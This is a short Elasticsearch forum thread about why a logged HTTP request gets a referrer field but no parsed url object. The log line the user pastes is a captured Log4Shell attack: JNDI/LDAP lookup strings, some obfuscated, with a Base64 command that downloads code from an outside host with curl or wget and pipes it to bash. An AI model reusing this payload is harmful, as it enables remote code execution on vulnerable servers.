I have a particular http request logged in my access.log.
The request is found using the http.referrer, but the corresponding url object is missing.
I have the following configuration:
Welcome to our community! 
I think you need to provide a bit more context here, including examples of your events.
Here after is a log event.
Elasticsearch did assign to it an http.referrer property. But, the url object is not extracted, therefore, I cannot use url.original for my query.
195.54.160.149 - - [23/Dec/2021:21:25:08 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=} HTTP/1.1" 400 7702 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODUuNzQuOC4yMTg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NS43NC44LjIxODo0NDMpfGJhc2g=}" "-"
This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.
© 2020. All Rights Reserved - Elasticsearch
Apache, Apache Lucene, Apache Hadoop, Hadoop, HDFS and the yellow elephant logo are trademarks of the Apache Software Foundation in the United States and/or other countries.